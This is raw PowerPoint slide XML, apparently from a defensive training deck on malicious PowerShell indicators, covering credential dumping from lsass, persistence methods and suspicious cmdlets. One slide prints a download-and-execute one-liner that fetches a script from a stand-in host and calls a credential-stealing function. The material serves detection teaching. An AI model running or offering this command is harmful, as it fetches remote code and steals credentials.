                    <a:pt x="166294" y="871784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157074" y="921248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149287" y="971093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142943" y="1021296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138051" y="1071833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134620" y="1122679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1209928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134620" y="1298956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138051" y="1349591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142943" y="1399952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149287" y="1450011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157074" y="1499742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166294" y="1549119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176939" y="1598115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188999" y="1646705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202464" y="1694861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217326" y="1742557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233576" y="1789767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251204" y="1836464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270200" y="1882623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290557" y="1928216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312264" y="1973217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335312" y="2017601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359692" y="2061340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385396" y="2104408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412413" y="2146779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440734" y="2188426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470351" y="2229323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501253" y="2269444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533433" y="2308762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566880" y="2347251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601585" y="2384884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637539" y="2421636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865632" y="2195195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830180" y="2158973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796224" y="2121686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="763780" y="2083371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732862" y="2044064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703485" y="2003804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675664" y="1962629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649414" y="1920575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624749" y="1877680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601685" y="1833983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580237" y="1789520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560419" y="1744329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542246" y="1698447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525733" y="1651913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510895" y="1604764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497747" y="1557036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486304" y="1508769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476580" y="1460000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468591" y="1410765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462352" y="1361103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457877" y="1311051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455181" y="1260647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454278" y="1209928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455181" y="1159220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457877" y="1108846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462352" y="1058839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468591" y="1009235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476580" y="960069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486304" y="911374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497747" y="863185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510895" y="815536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525733" y="768463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542246" y="721999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560419" y="676179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580237" y="631038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601685" y="586610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624749" y="542929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649414" y="500031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675664" y="457949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703485" y="416718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732862" y="376372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="763780" y="336947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796224" y="298476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830180" y="260994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865632" y="224536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637539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65263" y="5111496"/>
              <a:ext cx="1507235" cy="150723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379091" y="5347318"/>
            <a:ext cx="3170555" cy="79184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475"/>
              </a:spcBef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Shellcode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creates</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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endParaRPr sz="2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process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3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injects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3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DLL.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11671" y="7814564"/>
            <a:ext cx="3591560" cy="7912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8580" marR="5080" indent="-56515">
              <a:lnSpc>
                <a:spcPct val="114199"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Credential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dumping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dumps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credentials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from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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lsass.exe.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158221" y="5319166"/>
            <a:ext cx="2771775" cy="1173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-1270">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef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La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m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v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men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 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der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k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f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ows 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remote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execution.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70482" y="1933193"/>
            <a:ext cx="13517880" cy="18700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Detection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malicious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codes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is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done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through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monitoring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platforms,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hosts,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process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behavior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analysis.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Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3290570" marR="3690620">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pP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Persistence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uses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registry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autorun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keys,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services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sc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edule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sk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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>,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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>W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ndows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Management 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Instrumentation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15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(WMI)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event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subscriptions.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96915" y="306451"/>
            <a:ext cx="566420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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Indicators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45155" y="1933193"/>
            <a:ext cx="1136586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There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numerous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exploit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frameworks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leverage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PowerShell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functionality.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They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are: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7744" y="760476"/>
            <a:ext cx="8244840" cy="3657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151632" y="5213603"/>
            <a:ext cx="9867900" cy="1938655"/>
            <a:chOff x="3151632" y="5213603"/>
            <a:chExt cx="9867900" cy="193865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08020" y="5213603"/>
              <a:ext cx="9771888" cy="193852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1632" y="5593067"/>
              <a:ext cx="9867900" cy="126340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259836" y="5263895"/>
              <a:ext cx="9646920" cy="1815464"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9646920" h="1815465">
                  <a:moveTo>
                    <a:pt x="9646919" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1815083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9646919" y="1815083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9646919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259836" y="5263895"/>
              <a:ext cx="9646920" cy="1815464"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9646920" h="1815465">
                  <a:moveTo>
                    <a:pt x="0" y="1815083"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9646919" y="1815083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9646919" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1815083"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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3338576" y="5672454"/>
            <a:ext cx="9474200" cy="9467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 spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>powershell.exe "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Net.WebClient).DownloadString('https://badsite.foo/DoEvil.ps1'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2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Do-Evil</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-StealCreds"</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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192779" y="5096293"/>
            <a:ext cx="9804400" cy="2097405"/>
            <a:chOff x="3192779" y="5096293"/>
            <a:chExt cx="9804400" cy="209740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92779" y="5096293"/>
              <a:ext cx="9803892" cy="31847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238499" y="5141975"/>
              <a:ext cx="9690100" cy="204470"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9690100" h="204470">
                  <a:moveTo>
                    <a:pt x="9633585" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="56007" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34236" y="4411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16430" y="16430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4411" y="34236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="56007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="204215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9689592" y="204215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9689592" y="56007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9685180" y="34236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9673161" y="16430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9655355" y="4411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9633585" y="0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92779" y="7033259"/>
              <a:ext cx="9803892" cy="16001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238499" y="7078979"/>
              <a:ext cx="9690100" cy="45720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9690100" h="45720">
                  <a:moveTo>
                    <a:pt x="9689592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9689592" y="45720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9689592" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D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/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1789557" y="2857880"/>
            <a:ext cx="4339590" cy="519430"/>
            <a:chOff x="1789557" y="2857880"/>
            <a:chExt cx="4339590" cy="519430"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1799082" y="2867405"/>
              <a:ext cx="4320540" cy="500380"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="500379">
                  <a:moveTo>
                    <a:pt x="4237228" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="83312" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50899" y="6552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24415" y="24415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6552" y="50899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="83312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="499872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="499872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="83312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4313987" y="50899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296124" y="24415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4269640" y="6552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4237228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799082" y="2867405"/>
              <a:ext cx="4320540" cy="500380"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="500379">
                  <a:moveTo>
                    <a:pt x="83312" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4237228" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4269640" y="6552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296124" y="24415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4313987" y="50899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="83312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="499872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="499872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="83312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6552" y="50899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24415" y="24415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50899" y="6552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83312" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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1982851" y="2902966"/>
            <a:ext cx="249872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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Suspicious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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cmdlets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777364" y="3327272"/>
            <a:ext cx="12563475" cy="1510030"/>
            <a:chOff x="1777364" y="3327272"/>
            <a:chExt cx="12563475" cy="1510030"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1786889" y="3336797"/>
              <a:ext cx="12544425" cy="1490980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1490979">
                  <a:moveTo>
                    <a:pt x="12421616" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122428" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9628" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="122427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9628" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122428" y="1490472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12421616" y="1490472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="122427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124216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786889" y="3336797"/>
              <a:ext cx="12544425" cy="1490980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1490979">
                  <a:moveTo>
                    <a:pt x="0" y="122427"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9628" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122428" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12421616" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="9628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="35877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="74795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="122427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534415" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508166" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469248" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12421616" y="1490472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122428" y="1490472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74795" y="1480843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35877" y="1454594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9628" y="1415676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1368043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="122427"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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1982851" y="3672332"/>
            <a:ext cx="6022975" cy="1031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used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creating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processes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binaries.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264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used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downloading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files.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96915" y="306451"/>
            <a:ext cx="566420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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Indicators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69308" y="760476"/>
            <a:ext cx="7597140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810892" y="2329052"/>
            <a:ext cx="12563475" cy="1569085"/>
            <a:chOff x="1810892" y="2329052"/>
            <a:chExt cx="12563475" cy="1569085"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1820417" y="2807969"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="88772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88772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832609" y="2338577"/>
              <a:ext cx="4319270" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="469900">
                  <a:moveTo>
                    <a:pt x="4240784" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312864" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296092" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271224" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4240784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832609" y="2338577"/>
              <a:ext cx="4319270" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="469900">
                  <a:moveTo>
                    <a:pt x="78231" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4240784" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271224" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296092" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312864" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
